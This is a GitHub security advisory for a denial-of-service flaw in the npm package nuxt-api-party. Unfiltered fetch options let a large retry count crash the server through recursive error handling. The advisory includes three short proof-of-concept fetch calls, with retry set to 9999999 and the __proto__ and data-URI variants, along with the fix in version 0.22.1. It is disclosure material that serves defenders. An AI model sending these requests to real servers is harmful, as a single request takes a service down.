GHSA-q6hx-3m4p-749h

Suggest an improvement
Source
https://github.com/advisories/GHSA-q6hx-3m4p-749h
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/12/GHSA-q6hx-3m4p-749h/GHSA-q6hx-3m4p-749h.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-q6hx-3m4p-749h
Aliases
Published
2023-12-11T20:29:10Z
Modified
2026-09-10T03:50:04Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
Summary
DOS by abusing `fetchOptions.retry`.
Details

Summary

nuxt-api-party allows developers to proxy requests to an API without exposing credentials to the client. ofetch is used to send the requests.

The library allows the user to send many options directly to ofetch. There is no filter on which options are available. We can abuse the retry logic to cause the server to crash from a stack overflow.

Details

fetchOptions are obtained directly from the request body. These are then passed directly into ofetch .

We can construct a URL we know will not fetch successfully, then set the retry attempts to a high value, this will cause a stack overflow as ofetch error handling works recursively.

PoC

POC using Node.

await fetch("http://localhost:3000/api/__api_party/MyEndpoint", {
    method: "POST",
    body: JSON.stringify({ path: "x:x", retry: 9999999 }),
    headers: { "Content-Type": "application/json" }
})

We can use __proto__ as a substitute for the endpoint if it is not known.

await fetch("http://localhost:3000/api/__api_party/__proto__", {
    method: "POST",
    body: JSON.stringify({ path: "x:x", retry: 9999999 }),
    headers: { "Content-Type": "application/json" }
})

We can build the size of the stack faster by using more complicated URIs

await fetch("http://localhost:3000/api/__api_party/__proto__", {
    method: "POST",
    body: JSON.stringify({ path: "data:x;base64,----", retry: 9999999 }),
    headers: { "Content-Type": "application/json" }
})

Impact

Full DOS, server is unusable during attack. Requires a single request.

Fix

Limit which options can be passed to ofetch.

Database specific
{
    "cwe_ids":  [
        "CWE-400",
        "CWE-787"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2023-12-11T20:29:10Z",
    "nvd_published_at":  "2023-12-09T00:15:07Z",
    "severity":  "HIGH"
}
References

Affected packages

npm / nuxt-api-party

Package

Name
nuxt-api-party
View open source insights on deps.dev
Purl
pkg:npm/nuxt-api-party

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
0.22.1

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/12/GHSA-q6hx-3m4p-749h/GHSA-q6hx-3m4p-749h.json"